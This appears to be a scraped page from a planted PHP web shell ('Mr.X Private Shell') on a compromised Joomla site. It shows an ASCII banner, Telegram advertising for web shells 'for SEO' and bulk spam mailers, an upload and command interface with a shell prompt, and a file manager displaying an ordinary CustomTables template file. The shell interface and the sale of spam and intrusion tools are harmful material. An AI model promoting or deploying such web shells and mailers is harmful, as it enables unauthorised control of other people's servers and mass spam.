__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * CustomTables Joomla! 3.x/4.x/5.x Component
 * @package Custom Tables
 * @author Ivan Komlev <[email protected]>
 * @link https://joomlaboat.com
 * @copyright (C) 2018-2024. Ivan Komlev
 * @license GNU/GPL Version 2 or later - https://www.gnu.org/licenses/gpl-2.0.html
 **/

// no direct access
use CustomTables\common;
use CustomTables\CTMiscHelper;

defined('_JEXEC') or die();

common::loadJSAndCSS($this->ct->Params, $this->ct->Env);
$results = $this->details->render();

if ($this->ct->Env->frmt == 'csv') {
	$filename = CTMiscHelper::makeNewFileName($this->ct->document->getTitle(), 'csv');

	if (ob_get_contents())
		ob_end_clean();

	header('Content-Disposition: attachment; filename="' . $filename . '"');
	header('Content-Type: text/csv; charset=utf-8');
	header("Pragma: no-cache");
	header("Expires: 0");

	echo mb_convert_encoding($results, 'UTF-16LE', 'UTF-8');

	die;//clean exit
} elseif ($this->ct->Env->frmt == 'xml') {
	$filename = CTMiscHelper::makeNewFileName($this->ct->document->getTitle(), 'xml');

	ob_end_clean();

	if (ob_get_contents())
		ob_end_clean();

	header('Content-Disposition: attachment; filename="' . $filename . '"');
	header('Content-Type: text/xml; charset=utf-8');
	header("Pragma: no-cache");
	header("Expires: 0");
	ob_start();
	echo $results;
	ob_flush();
	die;//clean exit
} elseif ($this->ct->Env->clean) {
	echo $results;
	die;//clean exit
}

if ($this->ct->Params->showPageHeading) {
	if (isset($this->ct->Params->pageClassSFX)) {
		echo '<div class="page-header' . common::escape($this->ct->Params->pageClassSFX) . '"><h2 itemprop="headline">'
			. common::translate($this->ct->document->getTitle()) . '</h2></div>';
	} else {
		echo '<div class="page-header"><h2 itemprop="headline">'
			. common::translate($this->ct->document->getTitle()) . '</h2></div>';
	}
}
echo $results;
?>

<!-- Modal content -->
<div id="ctModal" class="ctModal">
    <div id="ctModal_box" class="ctModal_content">
        <span id="ctModal_close" class="ctModal_close">&times;</span>
        <div id="ctModal_content"></div>
    </div>
</div>
<!-- end of the modal -->

Filemanager

Name Type Size Permission Actions
default.php File 2.14 KB 0664
default.xml File 10.32 KB 0664
index.html File 43 B 0664
Filemanager